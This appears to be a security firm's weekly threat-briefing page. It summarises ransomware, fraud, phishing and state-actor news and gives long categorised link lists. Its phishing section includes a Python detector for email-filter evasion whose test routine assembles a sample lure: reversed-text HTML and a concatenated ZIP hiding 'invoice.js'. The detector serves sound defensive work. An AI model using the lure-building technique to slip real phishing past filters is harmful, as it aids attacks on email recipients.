Further details of the vulnerabilities in Ivanti Cloud Services Appliance (CSA) can be found here:
Further details of the vulnerabilities in Ivanti Workspace Control (IWC) can be found here:
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Workspace-Control-IWC?language=en_US
Further details of the vulnerabilities in Ivanti Endpoint Manager (EPM) can be found here:
Need help understanding your gaps, or just want some advice? Get in touch with us.
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Briefing 06 September 2024
Black Arrow Cyber Threat Intelligence Briefing 06 September 2024:
-Active Ransomware Groups Surge by 56% in 2024
-Authorised Push Payment (APP) Fraud Dominates as Scams Hit All-Time High
-Phishing Remains Top Cyber Threat, Credential Exposure Incidents Surging
-When Cyber Security Breaches Are Inevitable, It's Time to Call for A New Approach
-Critical Infrastructure Sustained 13 Cyber Attacks per Second in 2023
-How Phishing Messages Break Through Email Filters
-Can Every Business Afford to Be a Target?
-To Beat Cyber-Crime Your Business Needs a Cyber Hygiene Review
-UK Public Growing Anxious Over Dependence on IT Systems
-Russia’s Most Notorious Special Forces Unit Tied to Assassinations and Sabotage, Now Has Its Own Cyber Warfare Team
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Active Ransomware Groups Surge by 56% in 2024
There was a 56% increase in active ransomware gangs in the first half of 2024, with 73 groups in operation compared to 46 in H1 2023. This rise highlights the growing fragmentation of the ransomware landscape, partly driven by law enforcement actions that disrupted major Ransomware-as-a-Service (RaaS) groups. Notably, the ransomware gang BlackCat disappeared in an “exit scam” after receiving a ransom payment from US healthcare provider Change Healthcare in March 2024. Smaller groups are now emerging rapidly, executing targeted attacks, and frequently reappearing under new identities, complicating cyber security efforts.
Authorised Push Payment (APP) Fraud Dominates as Scams Hit All-Time High
The UK’s Financial Ombudsman Service reported a record high in fraud and scam cases in Q2 2024, with authorised push payment (APP) fraud making up over half of the complaints. APP fraud, where victims are tricked into transferring money to fraudsters, is contentious as many banks argue that victims made a conscious decision, thus forfeiting reimbursement. Between April and June 2024, 8,734 complaints were lodged, marking a 43% year-on-year increase. The rise is attributed not only to increased fraud but also to more complex multi-stage fraud, card payments lacking protection, and more cases being filed by professional representatives.
Phishing Remains Top Cyber Threat, Credential Exposure Incidents Surging
ReliaQuest’s Q3 2024 Attacker Trends Analysis reveals that phishing remains the top cyber threat, accounting for 37% of incidents. However, credential exposure incidents have surged dramatically to 88% of security alerts, up from 60% in 2023, indicating a critical weakness in credential management. Malware, particularly the JavaScript-based loader “SocGholish”, which is typically delivered through fake browser-update lures and is often linked to phishing campaigns, affected 23% of customers. MITRE ATT&CK techniques such as T1078 (Valid Accounts) and T1204 (User Execution) were also frequently observed, highlighting the need for stronger credential protection and phishing defences.
When Cyber Security Breaches Are Inevitable, It's Time to Call for A New Approach
At a recent TED Conference, discussions highlighted how emerging technologies like AI and quantum computing are poised to both elevate and challenge cyber security. Research from Proofpoint shows that 94% of cloud customers were targeted monthly in 2023, with 62% successfully compromised, underscoring the increased risk. To counter this, businesses must adopt a cyber resilience mindset, focusing on sustaining operations during and after a cyber attack. This involves planning, regular practice, early detection, and partnerships to ensure organisations remain resilient amid growing cyber threats.
Critical Infrastructure Sustained 13 Cyber Attacks per Second in 2023
Critical infrastructure faced over 420 million cyber attacks between January 2023 and January 2024, marking a 30% rise from the previous year. Power grids, transportation, and communication networks are particularly vulnerable due to the severe disruption any failures would cause. The US, UK, Germany, India, and Japan were the most frequently targeted, with threat actors predominantly originating from China, Russia, and Iran. The increasing digitisation of global infrastructure has heightened the risk of cyber attacks, particularly following the onset of the war in Ukraine.
How Phishing Messages Break Through Email Filters
The APWG’s Phishing Activity Trends Report for Q1 2024 revealed over 963,000 phishing attacks, with Business Email Compromise (BEC) fraud seeing a 50% rise in the average wire transfer request to $84,000. Cyber security researchers at LevelBlue Labs detailed sophisticated evasion techniques used by attackers, including voice phishing (vishing), exploiting compromised accounts, and leveraging social engineering. Attackers bypass secure email gateways (SEGs) with tactics such as manipulating ZIP archives and reversing text in the email source code, so that what the filter inspects differs from what the recipient sees or extracts, enabling them to distribute malware undetected. These developments highlight the urgent need for enhanced anti-phishing measures and user vigilance.
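Both gateway-evasion tricks named above, reversed text and manipulated ZIP attachments, can be caught by inspecting exactly the parts a filter tends to skip. The Python below is an added example written for this briefing; it is not code from LevelBlue Labs, the APWG or the cited report. It assumes the reversed text is produced either with Unicode bidirectional control characters or with CSS `unicode-bidi: bidi-override; direction: rtl` on an element, and that the ZIP manipulation is a concatenated archive (two ZIP files glued together, so the central directory one tool trusts does not describe every local file header present); the summary names neither mechanism, so both are assumptions. The sample email, its addresses and its attachment are constructed inline.

```python
# Added example: detect two secure-email-gateway evasion tricks in a raw email.
# Assumptions (not from the cited report): reversed text is produced with
# Unicode bidi controls or CSS bidi-override/rtl; the ZIP trick is concatenation.
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Bidirectional control characters (embeddings, overrides, isolates) that make
# stored text render in a different order than it is written.
BIDI_CONTROLS = "\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
# An element styled with bidi-override + rtl renders its text reversed, so
# the stored "eciovnI" is shown to the reader as "Invoice".
BIDI_ELEMENT_RE = re.compile(
    r'<(\w+)[^>]*style="[^"]*(?:unicode-bidi\s*:\s*bidi-override|direction\s*:\s*rtl)'
    r'[^"]*"[^>]*>(.*?)</\1>',
    re.I | re.S,
)
TAG_RE = re.compile(r"<[^>]+>")


def reversed_text_findings(html: str) -> list[str]:
    """Describe reversed-text tricks in an HTML body, showing what the reader sees."""
    findings = []
    if any(c in html for c in BIDI_CONTROLS):
        findings.append("unicode bidi control character in body")
    for _tag, inner in BIDI_ELEMENT_RE.findall(html):
        visible = TAG_RE.sub("", inner)[::-1]  # strip nested tags, then reverse
        findings.append(f"rtl-override element renders as: {visible}")
    return findings


def zip_findings(data: bytes) -> list[str]:
    """Flag a ZIP whose structure different extractors would read differently."""
    findings = []
    local_headers = data.count(b"PK\x03\x04")  # one per stored file
    eocd_records = data.count(b"PK\x05\x06")   # one per archive
    if eocd_records > 1:
        findings.append(f"{eocd_records} end-of-central-directory records (concatenated archives)")
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()  # Python trusts the last central directory
    except zipfile.BadZipFile:
        return findings + ["attachment not parseable as zip"]
    if local_headers != len(names):
        findings.append(
            f"{local_headers} local file headers but central directory lists {len(names)}: {names}"
        )
    return findings


def scan_email(raw: bytes) -> dict[str, list[str]]:
    """Return findings keyed by 'body' and by attachment filename."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report: dict[str, list[str]] = {}
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        report["body"] = reversed_text_findings(body.get_content())
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True)
        if payload and payload.startswith(b"PK"):
            report[part.get_filename() or "attachment"] = zip_findings(payload)
    return report


def make_zip(name: str, content: bytes) -> bytes:
    """Build a one-file ZIP in memory (stored, so the content holds no PK signatures)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


def build_sample_email() -> bytes:
    """Constructed sample lure: reversed 'Invoice' in the HTML and a concatenated ZIP."""
    msg = EmailMessage()
    msg["From"] = "billing@example.com"  # placeholder addresses
    msg["To"] = "finance@example.org"
    msg["Subject"] = "Payment"
    msg.set_content("Please open the attached invoice.")
    msg.add_alternative(
        "<p>Please open the attached\n"
        '<span style="unicode-bidi:bidi-override;direction:rtl">eciovnI</span>.</p>\n',
        subtype="html",
    )
    # Benign archive first, malicious second: a tool reading the first central
    # directory sees only readme.txt; one reading the last sees only invoice.js.
    glued = make_zip("readme.txt", b"nothing to see") + make_zip("invoice.js", b"// payload")
    msg.add_attachment(glued, maintype="application", subtype="zip", filename="invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for where, found in scan_email(build_sample_email()).items():
        print(where, found)
```

Run scan_email() over the raw RFC 822 bytes of a message from the mail store; a finding on either the body or an attachment is grounds to quarantine it for manual review rather than deliver it. The signature counts are read straight from the attachment bytes, so a large archive whose compressed data happens to contain "PK\x05\x06" can produce a false positive; treat the counts as a trigger for the central-directory comparison, not as proof on their own.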
Can Every Business Afford to Be a Target?
Small and medium-sized businesses (SMBs) face an evolving cyber threat landscape, as cyber criminals increasingly adopt business models like Ransomware-as-a-Service (RaaS). According to recent findings, SMBs are particularly vulnerable due to limited financial and staffing resources, leaving them exposed to phishing attacks, leaked data, and common technology vulnerabilities. Ransomware groups provide tools to less skilled attackers, expanding the scope of attacks. Phishing remains a significant threat, especially as SMBs rely on SaaS applications. To protect themselves, SMBs must find cost-effective solutions, such as automated threat monitoring and leveraging AI for threat intelligence analysis.
To Beat Cyber-Crime Your Business Needs a Cyber Hygiene Review
A recent survey revealed that 58% of large businesses experienced cyber crime in the past 12 months, costing around £5,000 per incident. With human error responsible for 95% of cyber security breaches, a focus on cyber hygiene is critical. Organisations should conduct a ‘cyber-hygiene deep clean,’ which includes documenting all hardware, software, and applications, and updating or uninstalling outdated or unused systems. Regular password updates, software patches, and thorough vulnerability assessments of public-facing assets are essential to prevent breaches. Protecting customer data, especially PII, must be prioritised to avoid compliance issues and fines.
UK Public Growing Anxious Over Dependence on IT Systems
A recent survey by OnePoll for the International Cyber Expo found that 78% of UK respondents are concerned about the heavy reliance of global organisations on IT systems and software providers. This comes after the July 2024 CrowdStrike outage, where a faulty update affected around 8.5 million computers worldwide, disabling many Windows systems. The survey revealed that 44% of respondents were impacted, with 18% directly affected and 26% knowing someone who was. The incident highlights growing apprehension over cyber security vulnerabilities and the potential for widespread disruption to everyday life and business operations.
Russia’s Most Notorious Special Forces Unit Tied to Assassinations and Sabotage, Now Has Its Own Cyber Warfare Team
A new cyber threat group, identified as Cadet Blizzard and linked to Russia’s GRU Unit 29155, has been revealed by Western government agencies. Known for its physical sabotage and assassinations, Unit 29155 has now developed a cyber warfare team responsible for multiple hacking operations targeting Ukraine, the US, and other countries. Since 2022, the group has launched attacks using WhisperGate malware, which destroyed data in at least two dozen Ukrainian organisations, and engaged in defacement and data theft under the guise of a fake hacktivist group, Free Civilian. This intertwining of physical and digital tactics highlights the growing threat posed by state-sponsored cyber warfare.
Sources
https://www.infosecurity-magazine.com/news/active-ransomware-groups-surge/
https://www.infosecurity-magazine.com/news/app-fraud-scams-alltime-high/
https://informationsecuritybuzz.com/phishing-top-cyber-threat-despite-drop/
https://www.techradar.com/pro/critical-infrastructure-sustained-13-cyber-attacks-per-second-in-2023
https://cybersecuritynews.com/phishing-email-filter-breakthroughs/
https://informationsecuritybuzz.com/can-every-business-afford-to-be-target/
https://itbrief.co.uk/story/uk-public-growing-anxious-over-dependence-on-it-systems
https://www.wired.com/story/russia-gru-unit-29155-hacker-team/
Governance, Risk and Compliance
To beat cyber-crime your business needs a cyber-hygiene review - Digital Journal
More than a CISO: the rise of the dual-titled IT leader | CSO Online
Quantifying Risks to Make the Right Cyber Security Investments (inforisktoday.com)
When Cyber Security Breaches Are Inevitable, It's Time To Call For A New Approach (forbes.com)
Making Enterprises Resilient In The Face Of Growing Cyber Threats (forbes.com)
Why the CFO-CISO relationship is key to mitigating cyber risk - Raconteur
Can Every Business Afford To Be A Target? (informationsecuritybuzz.com)
The true cost of cyber crime for your business - Help Net Security
Boards Need to Take a Hard Look at Their Cyber Vulnerabilities (forbes.com)
Incident response planning vital for cyber security (devx.com)
Surge in cyber risks will create new exposures (emergingrisks.co.uk)
Security boom is over, with third of budgets flat or falling • The Register
How Should You Manage Cyber Risk in 2024? (informationweek.com)
Cost of a data breach: Cost savings with law enforcement involvement (securityintelligence.com)
Don’t Get Your Security from Your RMM Provider: The Risks You Should Know | MSSP Alert
Insurance groups urge state support for ‘uninsurable’ cyber risks (ft.com)
Threats
Ransomware, Extortion and Destructive Attacks
RansomHub claims 210 scalps in bid for ransomware supremacy • The Register
Ransomware gangs of 2024: The rise of the affiliates (techinformed.com)
Everything you need to know about RansomHub, the new force in the digital extortion industry | ITPro
New ransomware group is hitting VMware ESXi systems hard | TechRadar
Active Ransomware Groups Surge by 56% in 2024 - Infosecurity Magazine (infosecurity-magazine.com)
Global Ransomware Attacks Spiked Along with Payments and Demands in Q2: Corvus (claimsjournal.com)
Ransomware tactics 2024: why you need to protect yourself differently | TechFinitive
How ransomware tactics are shifting, and what it means for your business - Help Net Security
Why Are Organisations Losing the Ransomware Battle? | Axio
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
Qilin Ransomware Attack Used To Steal Chrome Browser Data - Security Boulevard
RansomHub Emerges in Rapidly Evolving Ransomware Landscape - Security Boulevard
Fog ransomware crew evolving into wide-ranging threat | Computer Weekly
Cicada Ransomware - What You Need To Know | Tripwire
83% of organisations experienced at least one ransomware attack in the last year - Help Net Security
Researcher sued for sharing data stolen by ransomware with media (bleepingcomputer.com)
Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems (bleepingcomputer.com)
Ransomware Gangs Pummel Southeast Asia (darkreading.com)
Linux Ransomware Threats: How Attackers Target Linux Systems (itprotoday.com)
Ransomware Victims
Housing charity latest to get hit by ransomware attack - TFN
City of Columbus Sues Researcher Who Disclosed Impact of Ransomware Attack - SecurityWeek
Tewkesbury Borough Council cyber attack sparks disruption - BBC News
Halliburton confirms data was stolen in ongoing cyber attack | TechCrunch
‘Critical’ cyber attack on pension fund ‘almost certain’ - Somerset Live
Lockbit claims breach on Canada’s largest school board: Is the group back with a vengeance? | ITPro
Planned Parenthood confirms cyber attack as RansomHub claims breach (bleepingcomputer.com)
Phishing & Email Based Attacks
How Phishing Messages Break Through Email Filters - Report (cybersecuritynews.com)
Phishing Remains Top Cyber Threat (informationsecuritybuzz.com)
File-sharing phishing attacks zero-in on the financial sector | SC Media (scmagazine.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Help friends and family avoid phishing emails (appleinsider.com)
Novel attack on Windows spotted in Chinese phishing campaign • The Register
Travelers Beware of Sophisticated Booking.com Phishing Attack (cybersecuritynews.com)
Business Email Compromise (BEC)
Nigerian man sentenced to 5 years for role in BEC operation | CyberScoop
Two Nigerians Sentenced to Prison in US for BEC Fraud - SecurityWeek
Other Social Engineering
How Phishing Messages Break Through Email Filters - Report (cybersecuritynews.com)
APP Fraud Dominates as Scams Hit All-Time High - Infosecurity Magazine (infosecurity-magazine.com)
Stop Scanning Random QR Codes (gizmodo.com)
Quishing, an insidious threat to electric car owners (securityaffairs.com)
VIEW: Deepfakes represent growing cyber threat - CIR Magazine
The attack with many names: SMS Toll Fraud - Help Net Security
FBI warns crypto firms of aggressive social engineering attacks (bleepingcomputer.com)
Travelers Beware of Sophisticated Booking.com Phishing Attack (cybersecuritynews.com)
Cryptohack Roundup: Focus on Pig Butchering - DataBreachToday
Recruiters and job candidates need to be vigilant of emerging cyber crime (thehrdirector.com)
North Korean Hackers Targets Job Seekers with Fake FreeConference App (thehackernews.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Artificial Intelligence
The six most dangerous new threats security teams need to know about - IT Security Guru
AI-enhanced cyber attack tops emerging enterprise risk rankings – Gartner - CIR Magazine
AI as an Insider Threat | AFCEA International
87% of executives are concerned about bot attacks and AI fraud | Security Magazine
Deepfakes represent growing cyber threat - CIR Magazine
Gen reveals 46% surge in cyber attacks; AI scams grow rapidly (securitybrief.co.nz)
Think hard before deploying Copilot for Microsoft 365 • The Register
Businesses still ready to invest in Gen AI, with risk management a top priority | ZDNET
Clearview AI fined $33 million for facial recognition database | TechRadar
There are many reasons why companies struggle to exploit generative AI, says Deloitte survey | ZDNET
1 in 3 workers are using AI multiple times a week - and they're shouting about it | ZDNET
Inside NSA's partnerships with AI makers to prevent future attacks - Washington Times
Is AI the new bloatware? | ZDNET
AI, cyber and critical infrastructure | Professional Security
Governments need to beef up cyberdefence for the AI era - and get back to the basics | ZDNET
2FA/MFA
The six most dangerous new threats security teams need to know about - IT Security Guru
How Hackers Bypass MFA, And What You Can Do About It (forbes.com)
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Malware
'Voldemort' Malware Curses Orgs Using Global Tax Authorities (darkreading.com)
This malware pretends to be a real VPN service to lure in victims | TechRadar
GitHub comments abused to spread Lumma Stealer malware as fake fixes (bleepingcomputer.com)
Godzilla Fileless Backdoor Exploits Atlassian Confluence Vulnerability (cybersecuritynews.com)
3,000 "ghost accounts" on GitHub spreading malware (securityintelligence.com)
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore (thehackernews.com)
New Golang malware capable of cross-platform backdoor attacks spotted in the wild | TechRadar
What is malvertising? Cyber criminals exploiting search ads to spread malware | Invezz
China's 'Earth Lusca' Propagates Multiplatform Backdoor (darkreading.com)
Microsoft Observed A New Tickler Malware Attack Satellite Devices (cybersecuritynews.com)
Chinese organisations are being hit by Cobalt Strike malware from within China | TechRadar
New Backdoor Used By Iranian State-Sponsored Group | Decipher (duo.com)
Thousands of abandoned PyPI projects could be hijacked: Report | CSO Online
Fake OnlyFans cyber crime tool infects hackers with malware (bleepingcomputer.com)
Numerous malware deployed in prolonged APT32 intrusion | SC Media (scmagazine.com)
Mobile
Android And iOS Users Attacked By Russian APT29 Hackers, Google Warns (forbes.com)
This Popular App Company Was Sold, and Now Its Android Apps Are a Privacy Risk (makeuseof.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
Denial of Service/DoS/DDOS
Massive DDoS poured 3.15 billion packets per second on Microsoft server | Cybernews
Only 25% of organisations are prepared to manage a DDoS attack | Security Magazine
Internet of Things – IoT
Attacks Continue on Connected Devices - Electrical Contractor Magazine (ecmag.com)
A Deep Dive Into IoT Communication Protocols (informationsecuritybuzz.com)
CCTV biz Verkada pays $3M to settle FTC complaint • The Register
Data Breaches/Leaks
170 million strong data leak traced to US data broker | TechRadar
Over 1.4M Users Exposed in Tracelo Breach | MSSP Alert
Microchip Technology confirms data was stolen in cyber attack (bleepingcomputer.com)
Organised Crime & Criminal Actors
Philippine authorities detain more than 160 people over suspected cyber crime operation - Bloomberg
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
CEO's Arrest Likely Won't Dampen Cyber criminal Interest in Telegram (darkreading.com)
Alleged cyber criminal wanted by US spent 15 years evading arrest (voanews.com)
The true cost of cyber crime for your business - Help Net Security
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Cyber criminals use legitimate software for attacks increasing (securitybrief.co.nz)
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Microsoft Says North Korean Cryptocurrency Thieves Behind Chrome Zero-Day - SecurityWeek
FTC: Over $110 million lost to Bitcoin ATM scams in 2023 (bleepingcomputer.com)
FBI warns crypto firms of aggressive social engineering attacks (bleepingcomputer.com)
North Korean scammers prep stealth attacks on crypto outfits • The Register
Cryptohack Roundup: Focus on Pig Butchering - DataBreachToday
Insider Risk and Insider Threats
How Employees Can Protect a Company's Cyber Security - DevX
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
INSIDER THREAT AWARENESS MONTH: Are you prepared? - IT Security Guru
Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities (thehackernews.com)
Human firewalls are essential to keeping SaaS environments safe - Help Net Security
AI as an Insider Threat | AFCEA International
Insurance
Insurance groups urge state support for ‘uninsurable’ cyber risks (ft.com)
Supply Chain and Third Parties
UK Public Worried About Global Over Reliance on IT Systems - IT Security Guru
Improved Software Supply Chain Resilience Equals Increased Security (darkreading.com)
What is Vendor Risk Monitoring in Cyber Security? | UpGuard
Top 8 Vendor Risk Monitoring Solutions in 2024 | UpGuard
Boards Need To Take A Hard Look At Their Cyber Vulnerabilities (forbes.com)
Cloud/SaaS
A third of organisations suffered a SaaS data breach this year - Help Net Security
File-sharing phishing attacks zero-in on the financial sector | SC Media (scmagazine.com)
How Confident Are You That Your Critical Saas Applications Are Secure? (thehackernews.com)
Human firewalls are essential to keeping SaaS environments safe - Help Net Security
What Is the Shared Fate Model? (darkreading.com)
Rising cloud costs leave CIOs seeking ways to cope | CIO
Outages
UK public growing anxious over dependence on IT systems (itbrief.co.uk)
We must break tech monopolies before they break us (thenextweb.com)
Boards Need To Take A Hard Look At Their Cyber Vulnerabilities (forbes.com)
Identity and Access Management
Why Identity Teams Need to Start Reporting to the CISO (darkreading.com)
The Evolution of Identity and Access Management (IAM) - Security Boulevard
Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities (thehackernews.com)
Linux and Open Source
Linux Ransomware Threats: How Attackers Target Linux Systems (itprotoday.com)
Passwords, Credential Stuffing & Brute Force Attacks
Why You Shouldn't Store Passwords in Your Browser: Password Security Risks | HackerNoon
The New Effective Way to Prevent Account Takeovers (thehackernews.com)
Social Media
Russian minister: Telegram 'too free' on content moderation • The Register
Hacker Leaks Data of 390 Million Users from VK, a Russian Social Network (hackread.com)
Germany’s Far Right Is in a Panic Over Telegram | WIRED
Fake OnlyFans cyber crime tool infects hackers with malware (bleepingcomputer.com)
Malvertising
In plain sight: Malicious ads hiding in search results (welivesecurity.com)
What is malvertising? Cyber criminals exploiting search ads to spread malware | Invezz
Your Google searches becoming big target for 'malvertising' hackers (cnbc.com)
Malvertising is popping up on search engines - The Hustle
Regulations, Fines and Legislation
Clearview AI fined $33 million for facial recognition database | TechRadar
UK Signs Council of Europe AI Convention - Infosecurity Magazine (infosecurity-magazine.com)
CCTV biz Verkada pays $3M to settle FTC complaint • The Register
Models, Frameworks and Standards
6 IT risk assessment frameworks compared | CSO Online
Banks Brace for DORA Cyber Security Deadline on Jan. 17 (inforisktoday.com)
NIST Cybersecurity Framework (CSF) and CTEM – Better Together (thehackernews.com)
Complying with PCI DSS requirements by 2025 - Help Net Security
Explaining The OWASP API Security Top 10 (informationsecuritybuzz.com)
NIST Obtains OpenAI, Anthropic AI Model Access | MSSP Alert
Making Sense of Cyber Security Standards Like FedRAMP (pymnts.com)
Careers, Working in Cyber and Information Security
Championing the Wins to Improve Wellbeing in the Cyber Workplace - IT Security Guru
Biden admin calls infosec 'national service' in job-fill bid • The Register
Are IT certifications replacing the college degree? | CIO
Law Enforcement Action and Take Downs
Philippine authorities detain more than 160 people over suspected cyber crime operation - Bloomberg
IT worker charged over $750,000 cyber extortion plot against former employer (bitdefender.com)
Admins of MFA bypass service plead guilty to fraud (bleepingcomputer.com)
CEO's Arrest Likely Won't Dampen Cyber criminal Interest in Telegram (darkreading.com)
Nigerian man sentenced to 5 years for role in BEC operation | CyberScoop
Alleged cyber criminal wanted by US spent 15 years evading arrest (voanews.com)
UK trio pleads guilty to operating $10M MFA bypass biz • The Register
Two Nigerians Sentenced to Prison in US for BEC Fraud - SecurityWeek
Cost of a data breach: Cost savings with law enforcement involvement (securityintelligence.com)
Misinformation, Disinformation and Propaganda
Justice Department accuses Russia of interfering with 2024 elections | CyberScoop
US charges Russian GRU hacking team behind WhisperGate • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Nation State Actors
China
China's 'Earth Lusca' Propagates Multiplatform Backdoor (darkreading.com)
Chinese organisations are being hit by Cobalt Strike malware from within China | TechRadar
Novel attack on Windows spotted in Chinese phishing campaign • The Register
Russia
NCSC and allies call out Russia's Unit 29155 over cyber warfare | Computer Weekly
Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage - SecurityWeek
Russia’s Most Notorious Special Forces Unit Now Has Its Own Cyber Warfare Team | WIRED
Android And iOS Users Attacked By Russian APT29 Hackers, Google Warns (forbes.com)
Justice Department accuses Russia of interfering with 2024 elections | CyberScoop
Sweden warns of heightened risk of Russian sabotage | Sweden | The Guardian
Russian military intelligence organised cyber attacks against Estonian institutions | News | ERR
US charges Russian GRU hacking team behind WhisperGate • The Register
The FCC has finally banned Kaspersky from telecoms kits | TechRadar
Iran
Israeli spies targeted by Iranian hackers | SC Media (scmagazine.com)
Iranian cyber criminals are targeting WhatsApp users in spear phishing campaign | Malwarebytes
New Backdoor Used By Iranian State-Sponsored Group | Decipher (duo.com)
North Korea
North Korean scammers prep stealth attacks on crypto outfits • The Register
North Korean Hackers Targets Job Seekers with Fake FreeConference App (thehackernews.com)
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Numerous malware deployed in prolonged APT32 intrusion | SC Media (scmagazine.com)
Civil Rights Groups Call For Spyware Controls - Infosecurity Magazine (infosecurity-magazine.com)
Germany’s Far Right Is in a Panic Over Telegram | WIRED
Hacker Leaks Data of 390 Million Users from VK, a Russian Social Network (hackread.com)
Spyware vendors thwart restrictions by changing names, reorganise, move - The Washington Post
Predator spyware resurfaces with signs of activity, Recorded Future says | CyberScoop
Civil Rights Groups Call For Spyware Controls - Infosecurity Magazine (infosecurity-magazine.com)
Tools and Controls
To beat cyber-crime your business needs a cyber-hygiene review - Digital Journal
Evolution of Attack Surface Management - Security Boulevard
This malware pretends to be a real VPN service to lure in victims | TechRadar
API Attack Surface: How to secure it and why it matters - Security Boulevard
Why enterprises need real-time visibility of their invisible threats (betanews.com)
Quantifying Risks to Make the Right Cyber Security Investments (inforisktoday.com)
When Cyber Security Breaches Are Inevitable, It's Time To Call For A New Approach (forbes.com)
Making Enterprises Resilient In The Face Of Growing Cyber Threats (forbes.com)
Why the CFO-CISO relationship is key to mitigating cyber risk - Raconteur
Choosing the Best Cyber Security Prioritization Method for Your Organisation - Security Boulevard
What is Vendor Risk Monitoring in Cyber Security? | UpGuard
Is the "Network" Defendable? - Security Boulevard
How Confident Are You That Your Critical SaaS Applications Are Secure? (thehackernews.com)
The Evolution of Identity and Access Management (IAM) - Security Boulevard
NIST Cybersecurity Framework (CSF) and CTEM – Better Together (thehackernews.com)
Explaining The OWASP API Security Top 10 (informationsecuritybuzz.com)
Incident response planning vital for cyber security (devx.com)
Rising cloud costs leave CIOs seeking ways to cope | CIO
Think hard before deploying Copilot for Microsoft 365 • The Register
Use AI threat modeling to mitigate emerging attacks | TechTarget
Don’t Get Your Security from Your RMM Provider: The Risks You Should Know | MSSP Alert
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore (thehackernews.com)
Businesses still ready to invest in Gen AI, with risk management a top priority | ZDNET
Inside NSA's partnerships with AI makers to prevent future attacks - Washington Times
Other News
Critical infrastructure sustained 13 cyber attacks per second in 2023 | TechRadar
SQL injection bug allows anyone to skip airport security • The Register
TfL cyber attack could be due to poor cyber-hygiene, expert says - Verdict
TfL cyber attack could've brought London 'to a standstill' (telecomstechnews.com)
Can Every Business Afford To Be A Target? (informationsecuritybuzz.com)
We must break tech monopolies before they break us (thenextweb.com)
Cyber criminals use legitimate software for attacks increasing (securitybrief.co.nz)
Is the "Network" Defendable? - Security Boulevard
Surge in cyber risks will create new exposures (emergingrisks.co.uk)
Five notorious cyber attacks that targeted governments (theconversation.com)
Vulnerability Management
Tenable finds only 3% of vulnerabilities pose significant risks (securitybrief.co.nz)
Businesses must act now to address the zero day surge | TechRadar
Vulnerabilities
Veeam Releases Security Updates to Fix 18 Flaws, Including 5 Critical Issues (thehackernews.com)
Critical Flaws in Progress Software WhatsUp Gold Expose Systems to Full Compromise - SecurityWeek
Cisco warns of backdoor admin account in Smart Licensing Utility (bleepingcomputer.com)
Godzilla Fileless Backdoor Exploits Atlassian Confluence Vulnerability (cybersecuritynews.com)
Hacktivist Group Exploit WinRAR Vulnerability to Encrypt Windows & Linux (cybersecuritynews.com)
Chrome 128 Updates Patch High-Severity Vulnerabilities - SecurityWeek
Your Google Pixel Phone's September Update Arrived (droid-life.com)
YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel | Ars Technica
Worried about the YubiKey 5 vulnerability? Here's why I'm not | ZDNET
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code Execution (thehackernews.com)
ServiceNow Vulnerabilities: CVE-2024-4789 and CVE-2024-5217 | UpGuard
Log4j Continues to act as Organisational Vulnerability - Security Boulevard
DrayTek Vulnerabilities Added to CISA KEV Catalog Exploited in Global Campaign - SecurityWeek
Vulnerabilities In Two WordPress Contact Form Plugins Affect +1.1 Million (searchenginejournal.com)
VMware fixed a code execution flaw in Fusion hypervisor (securityaffairs.com)
D-Link says it is not fixing four RCE flaws in DIR-846W routers (bleepingcomputer.com)
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
As usual, contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness only. Linking to or reposting external content does not endorse any service or product, and we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 30 August 2024
Black Arrow Cyber Threat Intelligence Briefing 30 August 2024:
